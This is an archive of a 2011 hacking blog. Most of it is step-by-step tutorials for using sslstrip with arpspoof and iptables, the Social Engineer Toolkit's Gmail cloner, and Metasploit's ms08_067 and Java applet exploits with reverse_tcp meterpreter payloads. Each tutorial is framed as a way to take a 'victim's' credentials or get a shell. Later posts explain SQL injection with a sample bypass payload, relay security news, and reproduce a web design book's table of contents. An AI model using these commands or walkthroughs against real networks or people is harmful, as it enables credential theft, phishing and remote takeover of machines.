WEB SECURITY: 2011

Saturday, 24 December 2011

man in the middle attack using ssl strip

SSL STRIP

This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Requirements

Bactrack 5

For SSL SLRIP(in BACKTRACK 5 )

Python >= 2.5 (apt-get install python)
The python "twisted-web" module (apt-get install python-twisted-web)

Setup

tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(optional) sudo python ./setup.py install

Man in the Middle Attack Using SSL STRIP

step 1 : open Terminal and type

echo "1" > /proc/sys/net/ipv4/ip_forward

this command use for Flip your machine into forwarding mode

step 2 : now u need Setup iptables to redirect HTTP traffic to sslstrip so this command use for it

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

in my case

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 7777

this command is use for all traffic on 80 port is redirect to port number 7777

step 3 : now time to run sslstrip

path - /pentest/web/sslstrip

./sslstrip.py -l <listenPort> -w <txt file name >

in my case

sslstrip.py -l 7777 -w mitm

-w command - write all date in one txt file

step 4 : Dont close this terminal , open new terminal and run arpspoof of sniff data from the victim PC in network

Run arpspoof to convince a network they should send their traffic to you

arpspoof -i <interface> -t <targetIP> <gatewayIP>

in my case

arpspoof -i eth1 -t 192.168.1.102 192.168.1.1

IN VICTIM machine

IF u r blind successfull command than u r victim pc ip table is changed by arpspoof

so u r sniff victim's data.

when victim access his/her gmail account

so his/her open gmail site but this gmail site is not real
but it is look like real site .
one one difference - real gamil site is HTTPS but this is HTTP .

When ur victim enter his/her facebook Credential in this fake gmail website, arpspoof sniff this Credential and ssl strip is read this and write in txt file in u r /pentest/web/sslstrip.

in my case

txt file name - mitm.txt

You got ur victim facebook Credential..:D

- - - - - VIDEO TUTORIAL - - - - -

If you have any questions, Feel free to ask.
:D

Related post :

Hack windows 7 pc using metasploit

Wednesday, 21 December 2011

Social Engineer Toolkit (SET)-Credential Harvester Attack(hack gmail,facebook,twitter account)

SET is a menu driven based attack system, which is fairly unique when it comes to hacker tools. The decision not to make it command line was made because of how social-engineer attacks occur; it requires multiple scenarios, options, and customizations. If the tool had been command line based it would have really limited the effectiveness of the attacks and the inability to fully customize it based on your target. Let’s dive into the menu and do a brief walkthrough of each attack vector.

Requirements

1. Bactrack 5

Social Engineer Toolkit (SET)-Credential Harvester Attack

step 1 : 1st open terminal and go to this following path

cd /pentext/exploit/set

and than enter

and type ./set for open Social Engineer Toolkit

IT's look like

step 2 : Select option 1 : Social-Engineering Attacks from the set toolkit menu

now in set toolkit the new menu is open

step 3 : Select option 2 : Website Attack Vectors

The web attack vector is used by performing phishing attacks against the victim in hopes they click the link. There is a wide-variety of attacks that can occur once they click. We will dive into each one of the attacks later on.

now in set toolkit the new menu is open

step 4 : Select option 3 : Credential Harvester Attack Method

The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in the user credentials, the usernames and passwords will be posted back to your machine and then the victim will be redirected back to the legitimate site.

now in set toolkit the new menu is open

step 5 : Select option 2 : Site cloner

now in set toolkit the new menu is open

step 6 : Now u enter ur target URL which u want clone ex. https://gmail.com

than enter.

Now
Credential Harvester is runing on port 80
A attacker PC is ready for attack .

now an URL you should give to your victim http://<u r ip address>/

in my case

http://192.168.1.103/

IN VICTIM PC

When u r victim enter this url http://192.168.1.103/ . web browser open gmail website but this is fake site made by SET toolkit..

When ur victim enter his/her gmail Credential in this fake website , than fake website send Credential to attacker PC..

You got ur victim gmail Credential..:D

- - - - - VIDEO TUTORIAL - - - - -

If u want to learn How to use Credential Harvester Attack over the internet than click here(Youtube Video with HD print)

If you have any questions, Feel free to ask.
:D

Related post :

Hack windows 7 pc using metasploit

Tuesday, 20 December 2011

How to hack windows xp (sp1,sp2,sp3) using metasploit

In this article I will be showing you how to use Ms08_067_Netapi exploit in an Unpatched windows xp to gain access to the machine. The original name of the exploit is "Microsoft Server Service Relative Path Stack Corruption", This exploits helps bypassing NX on various operating systems and service packs, Before we jump into the actual exploitation process, i would suggest you taking some time looking at the exploit code here.

Requirements

1. Bactrack 5
2. Windows XP

How to hack windows xp using metasploit

Step 1 - First of all turn on your Backtrack 5 virtual machine .

Step 2 - Next on your console type "msfconsole", This will load the metasploit framework.

Step 3 - Next type "use windows/smb/ms08_067_netapi" in the console.

Step 4 - Now after the exploit has been setup, you would need to enter the RHOST, RHOST refers to the iP address of the victim. You can get the windows host iP by issuing the "ipconfig" command in the command prompt.

Step 5 - Once the exploit is setup, it's time to setup a payload, In this case we will use a windows/meterpreter/reverse_tcp command in the shell, Next you need to set the proper lhost <attacker ip address> by issuing the command "lhost <iP address>".

Step 6 - Next issue the command "show options" to check to see if every thing is setup fine.

Step 7 - Once you are done with the assessment, just type "exploit" in the console

If u r blind successfully exploit than u r got meterpreter shell in u r backtrack pc

- - - - - VIDEO TUTORIAL - - - - -

If you have any questions, Feel free to ask.
:D

Related post :

Hack windows 7 pc using metasploit

Tuesday, 13 December 2011

Hack windows 7 pc using metasploit (JAVA APPLET METHOD)

Hack windows 7

Requirement :

1.Metasploit Framework
2.Operating System(I'm recommend using Linux OS or Backtrack 5)

Step By Step :

1. Open your msfconsole and find java_signed_applet exploit with command search java_signed_applet. If you can't find it, try to update your Metasploit Framework to newer version with msfupdate command. If the exploit was available, let's continue with picture below.

use exploit/multi/browser/java_signed_applet ---> load the java_signed_applet exploit set payload windows/meterpreter/reverse_tcp ---> set the reverse_tcp meterpreter to connect back to our machine

2.we need to add some required switches to make an attack successful.but if you want to view available switches, you can type show options.

set srvhost 192.168.1.103 ---> host that served the exploit
set srvport 80 ---> I'm choose 80, because it's really great for computer social engineering especially social engineering via website
set uripath / ---> the URL format to send to victim (http://192.168.1.103) set lhost 192.168.1.103 ---> connect back address when successfully perform attack set lport 443 ---> port used to connect back to our machine
set LHOST 192.168.1.103 ----> host that served the exploit for payload

3.exploit

now an URL you should give to your victim http://192.168.1.103/

4.When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.

5. After victim open the malicious URL and click RUN

Press CTRL + C to stop the process or you can directly run sessions -l to view the active sessions.

Now u r got meterpreter shell in u r backtrack PC

- - - - - VIDEO TUTORIAL - - - - -

Related post :

Sunday, 27 November 2011

what is sql injection ?

SQL Injection: What is it?

SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database.

In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.

SQL Injection: An In-depth Explanation
Web applications allow legitimate website visitors to submit and retrieve data to/from a database over the Internet using their preferred web browser. Databases are central to modern websites – they store data needed for websites to deliver specific content to visitors and render information to customers, suppliers, employees and a host of stakeholders. User credentials, financial and payment information, company statistics may all be resident within a database and accessed by legitimate users through off-the-shelf and custom web applications. Web applications and databases allow you to regularly run your business.
SQL Injection is the hacking technique which attempts to pass SQL commands (statements) through a web application for execution by the backend database. If not sanitized properly, web applications may result in SQL Injection attacks that allow hackers to view information from the database and/or even wipe it out.
Such features as login pages, support and product request forms, feedback forms, search pages, shopping carts and the general delivery of dynamic content, shape modern websites and provide businesses with the means necessary to communicate with prospects and customers. These website features are all examples of web applications which may be either purchased off-the-shelf or developed as bespoke programs.
These website features are all susceptible to SQL Injection attacks which arise because the fields available for user input allow SQL statements to pass through and query the database directly.

Example of a SQLInjection Attack

Here is a sample basic HTML form with two inputs, login and password.

<form method="post" action="http://testasp.vulnweb.com/login.asp">
<input name="tfUName" type="text" id="tfUName">
<input name="tfUPass" type="password" id="tfUPass">
</form>

The easiest way for the login.asp to work is by building a database query that looks like this:

SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password’

If the variables $username and $password are requested directly from the user's input, this can easily be compromised. Suppose that we gave "Joe" as a username and that the following string was provided as a password: anything' OR 'x'='x

SELECT id
FROM logins
WHERE username = 'Joe'
AND password = 'anything' OR 'x'='x'

As the inputs of the web application are not properly sanitised, the use of the single quotes has turned the WHERE SQL command into a two-component clause.

The 'x'='x' part guarantees to be true regardless of what the first part contains.

This will allow the attacker to bypass the login form without actually knowing a valid username / password combination!

SQL INJECTION CHEAT SHEET

LIve Example of a SQLInjection Attack

http://www.youtube.com/watch?v=WGkntart6WI&feature=related

Sunday, 20 November 2011

Maharashtra Highway Police website hacked

Not only International Law Enforcement and Police Under Hacker's attack, Even our Local Police websites and Database also become of Victim of breaches mostly once a day. A hacker With name "powerin10" take responsibility to hack Maharashtra Highway Police website. A mirror of this hack is available here. Hacker is member of Bangladesh Cyber Army.

Hackers destroyed a pump used by a US water utility

Hackers destroyed a pump used by a US water utility after gaining unauthorized access to the industrial control system it used to operate its machinery. Five computer screenshots posted early Friday purport to show the user interface used to monitor and control equipment at the Water and Sewer Department for the City of South Houston, Texas.

''This is arguably the first case where we have had a hack of critical infrastructure from outside the United States that caused damage,'' a managing partner at Applied Control Solutions, Joseph Weiss, said.

The network breach was exposed after cyber intruders burned out a pump. ''No one realised the hackers were in there until they started turning on and off the pump,'' he said.

It said hackers apparently broke into a software company's database and retrieved usernames and passwords of various control systems that run water plant computer equipment.Using that data, they were able to hack into the Illinois plant.

The U.S. Department of Homeland Security and the Federal Bureau of Investigation are examining the matter, said DHS spokesman Peter Boogaard.

"At this time there is no credible corroborated data that indicates a risk to critical infrastructure entities or a threat to public safety," he said, declining to elaborate further. An FBI spokesman in Illinois did not return phone calls seeking comment.

Friday, 18 November 2011

US military's offensive operations in cyberspace to shoot Hackers

The US military is now legally in the clear to launch offensive operations in cyberspace, the commander of the US Strategic Command has said. The Pentagon has just sent a report to Congress where it says that it has the right to retaliate with military force against a cyber attack.

Air Force General Robert Kehler said in the latest sign of quickening U.S. military preparations for possible cyber warfare that "I do not believe that we need new explicit authorities to conduct offensive operations of any kind".

US Strategic Command is in charge of a number of areas for the US military, including space operations (like military satellites), cyberspace concerns, 'strategic deterrence' and combating WMDs.

"When warranted, we will respond to hostile acts in cyberspace as we would to any other threat to our country," the DoD said in the report. "All states possess an inherent right to self-defense, and we reserve the right to use all necessary means – diplomatic, informational, military, and economic – to defend our nation, our allies, our partners, and our interests."

This means that if anyone carries out a decent attack on the Pentagon website, the Navy Seals will land on his roof, run through his house shooting anything that moves and bury the body at sea. US security agencies are also training a crack team of highly skilled cyber forensics experts and are working with international partners to share information about cyber threats, including malicious code and the people behind it, it said.

Patches Released for BIND Denial-of-service Vulnerability

There's a new vulnerability in the popular BIND name server software that is causing various versions of the application to crash unexpectedly after logging a certain kind of error. The Internet Systems Consortium (ISC), an organization that maintains several software products critical for Internet infrastructure, has released a patch for an actively exploited denial-of-service vulnerability in the widely used BIND DNS server.

The internet Systems Consortium (ISC) have described the problem as follows:
An as-yet unidentified network event caused BIND 9 resolvers to cache an invalid record, subsequent queries for which could crash the resolvers with an assertion failure...
Affected servers crashed after logging an error in query.c with the following message: "INSIST(! dns_rdataset_isassociated(sigrdataset))
More details are available in their advisory.

As of this posting, ISC had not revealed the underlying problem, but said the patches would prevent the servers from crashing. The flaw affects BIND 9.4-ESV, 9.6-ESV, 9.7.x, and 9.8.x. The patch basically ensures that the cache doesn't return the anomalous data and prevents the server from crashing. ISC officials had not responded to media inquiries as of this posting, and it was unclear whether the flaw was just wreaking mayhem on the servers, or if an actual exploit was causing it.

Security intelligence firm Rapid7 said the first attack was discovered at The National Weather Service, with the following 89 discoveries of the attack on US universities."Bind 9 is the most widely used DNS server on the internet today… Gone unchecked, this attack could potentially affect nearly the entire internet," said Matt Barrett, senior solutions architect at Rapid7. A temporary patch has already been released.

Thursday, 17 November 2011

Worlds first windows 8 Bootkit to be released at MalCon

It is amazing how fast security measures are bypassed by hackers. it seems Windows 8 is now Malconed! Peter Kleissner has created the world's first Windows 8 Bootkit which is planned to be released in India at the International Malware Conference MalCon.

An independent programmer and security analyst, peter was working for an anti-virus company from 2008 to 2009 and was speaker at the Black Hat and Hacking at Random technical security conferences. While his main operating fields are Windows security and analysis of new malware, his recent Important projects include the development of the Stoned Bootkit, a research project to subvert the Windows security model.

A bootkit is built upon the following broad parts:
Infector
Bootkit
Drivers
Plugins (the payload)
And as put by peter, those parts are easy to split up in a criminal organization: Teams A-D are writing on the different parts. If you are doing it right, Team D (the payload writers) need no internal knowledge of the bootkit! Peter's research website: http://www.stoned-vienna.com/

As per the MalCon website, peter's travel is still not confirmed citing VISA issues, however, there are chances that the presentation may be done over the video or a speaker may step in on behalf of peter and release it at MalCon.

Wednesday, 16 November 2011

Site Point - The Principles of Beautiful Web Design By Jason Beaird ( Second Edition )

Publisher: SitePoint
November 15, 2010
Pages: 190
More Info :-
http://www.sitepoint.com/books/design2/
AND
http://jasongraphix.com/journal/second-edition/

Many non-designers believe that they’re unable to create visually pleasing websites because they didn’t go to art school, or that they lack creative flair.

Thankfully, this isn’t true.

There are certain design maxims and techniques anyone can learn and apply to ensure that their website is not only functional, but sexy too. No art school required.

Whether you want to improve the look of an ordinary website or learn a new set of skills, The Principles of Beautiful Web Design, Second Edition will teach you good design fundamentals, ensuring that you avoid making any rookie mistakes.

The second edition of The Principles of Beautiful Web Design has been expanded and revised, and is illustrated with full-color examples. It’s an easy-to-follow guide that will lead you through the process of creating great designs from start to finish.

You'll learn how to:
apply color effectively and develop killer color schemes
construct practical layout foundations using whitespace and grids
use textures – point, line, shape, volume, depth, and pattern
master the art of typography to make dull websites dazzle
choose, edit, and position imagery effectively
design confidently for mobile devices
see into the future of web fonts, including @font-face

About Jason

Jason Beaird is a designer and front-end developer with over ten years of experience working on a wide range of award-winning web projects. With a background in graphic design and a passion for web standards, he’s always looking for accessible ways to make the Web a more beautiful place. When he’s not pushing pixels in Photoshop or tinkering with markup, Jason loves sharing his passion for the Web with others.

Chapter 1 Layout and Composition . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
The Design Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Exploration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Defining Good Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
Web Page Anatomy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Grid Theory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
The Rule of Thirds . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
960 Grid System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Balance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Symmetrical Balance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Asymmetrical Balance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Unity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Proximity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
Repetition . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20

Emphasis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Placement . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Continuance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Isolation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Contrast . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Proportion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Bread-and-butter Layouts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Left-column Navigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
Right-column Navigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
Three-column Navigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
Finding Inspiration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
Using a Morgue File . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
Fresh Trends . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
Navigationless Magazine Style . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
Expansive Footers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
Bare-bones Minimalism . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
Resizing: Fixed, Fluid, or Responsive Layouts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
Fixed Width . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
Fluid Width . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
An Alternative: Responsive Layouts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
Screen Resolution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
Application: Southern Savers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
Getting Started . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
Chapter 2 Color . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
The Psychology of Color . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
Color Associations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
Color Temperature . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
Chromatic Value . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
Saturation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
Color Theory 101 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
Red, Yellow, and Blue, or CMYK . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
The Scheme of Things . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55
xA Monochromatic Color Scheme . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
An Analogous Color Scheme . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
A Complementary Color Scheme . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
Split-complementary, Triadic, and Tetradic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
Other Variants . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69
Creating a Palette . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
Hexadecimal Notation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
Color Tools and Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
Color Scheme Designer 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
Adobe Kuler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
COLOURlovers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
Color Stream iPhone App . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
Pictaculous . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75
Colour Contrast Check . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
Application: the Color of Coupons . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
Chapter 3 Texture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
Point . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
Line . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
Shape . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
Rounded Corners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
Rotation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89
Shapes and Layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90
Volume and Depth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
Perspective . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
Proportion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
Light and Shadow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
Pattern . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
Building Texture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
Aged, Weathered, Worn, and Nostalgic Style . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
Clean and Grainy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105
Handcrafted Scrapbook . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107
Whimsical Cartoon Style . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
xiMinimal Texture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111
Starting Your Own Textural Trends . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
Application: Clipping and Saving . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113
Chapter 4 Typography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
Taking Type to the Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119
Text Image Replacement . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121
Web Fonts with @font-face . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
Self-hosted Web Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
Web Font Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124
sIFR and Cufón . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
Anatomy of a Letterform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
Text Spacing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Horizontal Spacing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Vertical Spacing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130
Text Alignment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 130
Typeface Distinctions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
Serif Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
Sans-serif Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
Handwritten Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137
Fixed-width Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138
Novelty Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 141
Dingbat Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 142
Finding Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Free Font Galleries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Commercial Font Galleries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Individual Artists and Foundries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Choosing the Right Fonts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145
Setting Font Size and Line Height . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
Using Punctuation and Special Characters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
Application: The Fine Print . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
Chapter 5 Imagery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153
What to Look For . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154
Legitimate Image Sources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
Take It or Make It . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
Stock Photography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
Getting Professional Help . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164
How Not to Impress . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166
Google Ganking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166
Hotlinking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167
Clipart . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 168
Creative Cropping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
Photoshop Adjustments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
